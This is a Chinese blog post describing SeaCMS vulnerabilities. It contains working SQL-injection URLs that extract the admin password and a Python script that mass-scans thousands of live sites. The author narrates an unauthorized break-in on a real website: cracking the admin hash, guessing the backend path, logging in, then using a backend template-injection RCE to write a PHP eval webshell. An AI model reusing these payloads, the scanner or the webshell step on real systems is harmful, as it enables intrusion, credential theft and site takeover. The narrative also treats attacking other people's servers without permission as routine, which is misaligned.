Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章

已于 2023-02-15 13:04:51 修改
阅读量5.9k 收藏 3
点赞数 4
分类专栏: 网络安全 渗透测试 文章标签: 安全
于 2019-06-21 23:48:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_26091745/article/details/93249670
版权

0x00 前言

有技术交流或渗透测试培训需求的朋友欢迎联系QQ/VX-547006660,需要代码审计、渗透测试、红蓝对抗网络安全相关业务可以看置顶博文

2000人网络安全交流群,欢迎大佬们来玩
群号820783253

0X01海洋CMS简介#

海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms)
file
呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息都已经上了首页了。。
file

0X002海洋CMS V9.1以下版本全版本SQL注入分析#

看到了最近tools上最新的seacms sql注入漏洞,不由得下体一硬。
干干巴巴的,cnm,必须盘他!

漏洞产生处code如下

session_start();
require_once("../../include/common.php");
$id = (isset($gid) && is_numeric($gid)) ? $gid : 0;
$page = (isset($page) && is_numeric($page)) ? $page : 1;
$type = (isset($type) && is_numeric($type)) ? $type : 1;
$pCount = 0;
$jsoncachefile = sea_DATA."/cache/review/$type/$id.js";
//缓存第一页的评论
if($page<2)
{
        if(file_exists($jsoncachefile))
        {
                $json=LoadFile($jsoncachefile);
                die($json);
        }
}
$h = ReadData($id,$page);
$rlist = array();
if($page<2)
{
        createTextFile($h,$jsoncachefile);
}
die($h);        

function ReadData($id,$page)
{
        global $type,$pCount,$rlist;
        $ret = array("","",$page,0,10,$type,$id);
        if($id>0)
        {
                $ret[0] = Readmlist($id,$page,$ret[4]);
                $ret[3] = $pCount;
                $x = implode(',',$rlist);
                if(!empty($x))
                {
                $ret[1] = Readrlist($x,1,10000);
                }
        }
        $readData = FormatJson($ret);
        return $readData;
}

function Readmlist($id,$page,$size)
{
        global $dsql,$type,$pCount,$rlist;
        $ml=array();
        if($id>0)
        {
                $sqlCount = "SELECT count(*) as dd FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC";
                $rs = $dsql ->GetOne($sqlCount);
                $pCount = ceil($rs['dd']/$size);
                $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND v_id=$id ORDER BY id DESC limit ".($page-1)*$size.",$size ";
                $dsql->setQuery($sql);
                $dsql->Execute('commentmlist');
                while($row=$dsql->GetArray('commentmlist'))
                {
                        $row['reply'].=ReadReplyID($id,$row['reply'],$rlist);
                        $ml[]="{\"cmid\":".$row['id'].",\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".date("Y/n/j H:i:s",$row['dtime'])."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
                }
        }
        $readmlist=join($ml,",");
        return $readmlist;
}

function Readrlist($ids,$page,$size)
{
        global $dsql,$type;
        $rl=array();
        $sql = "SELECT id,uid,username,dtime,reply,msg,agree,anti,pic,vote,ischeck FROM sea_comment WHERE m_type=$type AND id in ($ids) ORDER BY id DESC";
        $dsql->setQuery($sql);
        $dsql->Execute('commentrlist');
        while($row=$dsql->GetArray('commentrlist'))
        {
                $rl[]="\"".$row['id']."\":{\"uid\":".$row['uid'].",\"tmp\":\"\",\"nick\":\"".$row['username']."\",\"face\":\"\",\"star\":\"\",\"anony\":".(empty($row['username'])?1:0).",\"from\":\"".$row['username']."\",\"time\":\"".$row['dtime']."\",\"reply\":\"".$row['reply']."\",\"content\":\"".$row['msg']."\",\"agree\":".$row['agree'].",\"aginst\":".$row['anti'].",\"pic\":\"".$row['pic']."\",\"vote\":\"".$row['vote']."\",\"allow\":\"".(empty($row['anti'])?0:1)."\",\"check\":\"".$row['ischeck']."\"}";
        }
        $readrlist=join($rl,",");
        return $readrlist;
}

$rlist还未被初始化就先进入到了ReadData函数,但实际上 $rlist 可控,最终Readrlist函数造成注入
漏洞利用Exploit如下(获取管理员表中第一个用户的密码)

http://www.seacms.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

Exploit2(获取管理员表中第一个用户的账号)

http://www.seacms.net/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

0X003实战注入利用#

拿到exp后一不做二不休,直接写了个脚本怼了一下百度权重排名前10000的站点:
file

code如下(url.txt内容为你要批量测试的url)

import requests
print(" Seacms v9 SQL Injection-Author:J0o1ey QQ:547006660")
urls = open(r"url.txt", "r")
payload = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
for url in urls:
    testurl = url.strip() + payload
    html = requests.get(testurl).text
    if "seacms" in html:
        print("[+]Exploit URL:" + testurl)

虽然比较简陋,但也够用了
file
发现了一个目标
https://www.***.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

file

获取到admin用户的md5加密后的密码为b93af3cf59d757e27ca5
somd5成功解密

file

密码为Qq7788520

0x004成功获取后台#

拿着后台路径扫描的程序瞎jb一顿乱扫,结果并没有扫到后台

file
光拿到管理员账号密码,但是没有后台,那有个卵用啊。。。

但是,我眉头一皱,发现事情并不简单
前面获取到的密码是Qq7788520,这应该是管理员的qq吧?

file

猜测后台为https://www.***.com/7788520
结果Duang的一下~真tmd是后台。。。。进去了

file

用之前注入到的账号密码,成功登录之

file

0x004从后台RCE到Getshell#

即使进了后台,拿不到shell的话,也是很鸡肋的,于是我便找了一下seacms公开的漏洞
最后找到了CVE-2018-14421,一个Seacms Backend的RCE

漏洞详情链接:seacms backend getshell | Image's blog

漏洞分析文章:CVE-2018-14421——Seacms后台getshell分析 - 安全客,安全资讯平台

按照作者给出的方法,是在后台编辑video的时候,在图片pic处注入代码

{if:1)$GLOBALS['_G'.'ET'][a]($GLOBALS['_G'.'ET'][b]);//}{end if}

利用是:/details/index.php?1.html&m=admin&a=assert&b=phpinfo()
当然了,不一定偏要像作者那样利用,只要在这个video的照片出现的地方通过get方式传导php代码即可

我在首页上找到了一个叫做“xxx”的video,

file

在后台搜索该影片后
我把它的照片链接处改为了{if:1)$GLOBALS[‘_G’.’ET’]a;//}{end if}

file

随后访问链接:

http://www.***.com/index.php?1.html&m=admin&a=assert&b=${fputs(fopen(%27d.php%27,%27w%27),%27%3C?php%20@eval($_POST[c])?%3E%27)};

成功通过RCE利用PHP的fputs函数在网站根目录下,写入了一个名为d.php的Webshell(密码为c)

高高兴兴连接之

file

0x005总结

今天给大家介绍了Seacms的最新SQL注入技术和后台RCE技术

文章从11点写到凌晨1点半,整个人确实有些疲倦。

早在一年以前朋友就推荐我加入圈子社区,但由于但是比较忙,并没有时间撰稿,所以也就没有加入。

当时看到圈子社区负责人的ID:国士无双,不由得心头一颤啊

高中时期,我的语文老师告诉我——“你要做一个顶天立地的’士’啊,士不可以不弘毅!”

从此,成为一个“士”成了我一生的追求

任重而道远,仁以为己任。这是士。

为天地立心,为生民立命,为往圣继绝学,为万世开太平,这就是士的追求。

这世界上,其实我们并没有独行。

每个坚守正道,愿意以己之血荐此轩辕的人,终会配得上“国士无双”四个字。

J0o1ey
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
海洋CMS /js/player/dmplayer/dmku/ SQL注入漏洞复现(CVE-2024-29275)
0xSec
06-12 616
海洋CMS影视管理系统 /js/player/dmplayer/dmku/ 接口存在SQL注入漏洞,未经授权攻击者可通过该漏洞获取数据库敏感信息,进一步利用可获取服务器权限,导致网站处于极度不安全状态。
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1272
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1194
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
探索SeACMS:一个创新的内容管理系统
gitblog_00027的博客
04-08 340
探索SeACMS:一个创新的内容管理系统 项目地址:https://gitcode.com/HuaQiPro/seacms SeACMS 是一款强大的开源内容管理系统,专为现代互联网应用设计,旨在提供高效、灵活且易于维护的内容管理解决方案。这篇技术解析将带你深入了解其核心特性、工作原理以及如何利用它来构建和管理你的在线内容。 技术分析 架构设计 SeACMS 基于前后端分离的设计理念,前端采用现代...
seacms v10.1后台多处RCE 分析
RestoreJustice的博客
03-19 387
因为插入代码要注释掉后面的语句并且闭合前面的(不会影响页面正常,隐蔽性好。seacms多处存在RCE,原因都是对传入的参数未经过滤直接写入文件中执行造成的。这是是将设置参数值写入data/admin/ip.php文件,完成设置。这里构造耀执行的代码时,需要注意闭合前面的语句和注释后面的引号。这里参数很多,有的为了避免XSS,还是有做html实体编码的。这里可以开启或关闭IP安全设置并可以指定ip,通过。并且直接传入的参数拼接写入文件,没有任何过滤。这里也是同样的原因,没有过滤就直接写入文件。
Drupalgeddon2:针对 Drupal v7.x + v8.x 的漏洞利用 (Drupalgeddon 2 CVE-2018-7600 SA-CORE-2018-002)
05-29
- 'Drupalgeddon2' RCE (SA-CORE-2018-002) ( ) 支持: Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 ~ user/register URL,攻击account/mail & #post_render参数,使用 PHP 的passthru函数Drupal < 7.58 ~ ...
K8 weblogic-CVE-2018-2628-getshell工具
08-14
【K8 weblogic-CVE-2018-2628-getshell工具】是一款针对Oracle WebLogic服务器的渗透测试工具,主要用于检测和利用CVE-2018-2628安全漏洞。该漏洞是WebLogic服务器的一个严重远程代码执行(RCE)漏洞,允许攻击者在...
K8 weblogic-CVE-2018-2628-getshell
05-08
【K8 weblogic-CVE-2018-2628-getshell】是一个针对WebLogic服务器的安全漏洞利用工具,该工具主要用于渗透测试环境,旨在帮助安全研究人员检测和验证特定漏洞的存在,而不是用于非法攻击。在理解这个工具之前,我们...
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
tongda_oa_rce:通达oa越权登录+文件上传getshell
03-20
通达OA越权登录+文件上传getshell 用法 点安装-r requirements.txt python tongda.py url.txt:测试url,支持批量 shell.txt:上传成功的webshel​​l cookie.txt:登录成功的cookie webshel​​l密码a 已测试...
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1673
seaCms-命令执行】后门代码写入可解析文件中
seacms海洋cms漏洞
YouthBelief的博客
10-29 5535
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026)
最新发布
weixin_43167326的博客
05-10 570
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! CVE-2024-26026是BIG-IP Next Central Manager中的SQL注入漏洞。未经身份验证的远程攻击者可以通过向易受攻击的Next Central Manager API端点发送
hackbar执行Linux指令,记一次海洋cms任意代码执行漏洞拿shell(url一句话)
weixin_30800615的博客
05-12 679
实验环境:海洋CMS6.54(后续版本已该洞已补)1、后台登录尝试这个站点是个测试站,站里没什么数据。 进入admin.php,是带验证码的后台登录系统,没有验证码的可以用bp爆破。有验证码的也有一个爆破软件,可以识别验证码的,但是试了试用不了。后天失败。。。2、网上搜集该CMS的漏洞刚才也说了,这个站没什么数据,都是空的,无上传点。百度搜索海洋CMS的漏洞,有好几个版本的。尝试失败,该版本的漏洞...
海洋CMS:采集利器还是采集神器?速度、准确性、范围全面对比
wanghui19880909的博客
12-13 1019
海洋CMS是一款常用的内容管理系统,它具有强大的采集功能,可以帮助用户快速获取网络上的各类文章资源。在这篇评测对比文章中,我将从七个方面对海洋CMS的采集功能进行详细介绍和比较。1.采集速度海洋CMS的采集速度非常快,通过优化的算法和高效的网络连接,它能够在短时间内完成大量文章的采集任务。
黑帽SEO从RCE漏洞Get Shell到网站篡改、定向劫持移动端流量实践分析
2301_77732591的博客
04-24 446
篡改黑链一直是网站防护绕不开的风险点,且篡改事件背后一直隐隐约约黑灰产的身影。移动互联网用户基数大,而黑灰产的博彩、色情对移动端流量的需求经久不衰,网站篡改定向劫持移动端流量、黑灰产博彩色情地址只接受来自移动端流量,已经成为黑帽SEO的普及手段。
seacms前台getshell
ranuy阮的博客
06-11 1063
0x01 简介 海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。 0x02 环境搭建 使用phpstudy进行搭建。将整个upload上传到phpstudy目录下的www目录。将upload更改为seacms。 http://xxx.xxx.xxx.xxx/seacms/install/index.php进行安装。 安装成功后访问前台界面
Seacms漏洞
Grey的博客
07-10 5028
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
wbce cms搭建教程
01-23
根据提供的引用内容,WBCE CMS是一套基于PHP和MySQL的开源内容管理系统。它是一个通用的、用户友好的CMS,附带了一些用于简单文本页、新闻、联系人表单的模块,并包括有用的管理工具。此外,WBCE插件库中提供了各种各样的库、交互和结构化内容等模块,并且可以轻松安装。 关于WBCE CMS的搭建教程,以下是一个简单的步骤: 1. 下载WBCE CMS:访问WBCE CMS的官方网站(https://wbce.org/)并下载最新版本的WBCE CMS。 2. 解压文件:将下载的压缩文件解压到您选择的Web服务器的根目录或子目录中。 3. 创建数据库:使用MySQL或其他支持的数据库管理工具创建一个新的数据库,并记下数据库名称、用户名和密码。 4. 配置数据库连接:在解压后的WBCE CMS文件夹中,找到名为"config.inc.php"的文件,并使用文本编辑器打开它。在文件中找到以下行: ```php define('DB_HOST', 'localhost'); define('DB_NAME', 'your_database_name'); define('DB_USER', 'your_username'); define('DB_PASS', 'your_password'); ``` 将上述行中的"your_database_name"、"your_username"和"your_password"替换为您在步骤3中创建的数据库的名称、用户名和密码。 5. 配置网站设置:在同一个"config.inc.php"文件中,您还可以配置其他网站设置,例如网站名称、管理员用户名和密码等。 6. 安装WBCE CMS:在浏览器中访问您的WBCE CMS安装目录(例如http://yourdomain.com/wbce/)并按照安装向导的指示进行安装。您需要提供管理员用户名和密码以及其他必要的信息。 7. 完成安装:安装完成后,您将能够访问WBCE CMS的后台管理界面,并开始创建和管理您的网站内容。 请注意,以上是一个简单的搭建教程,具体步骤可能因版本和个人需求而有所不同。建议在搭建之前仔细阅读官方文档和安装指南,以确保正确地配置和使用WBCE CMS。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

J0o1ey

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值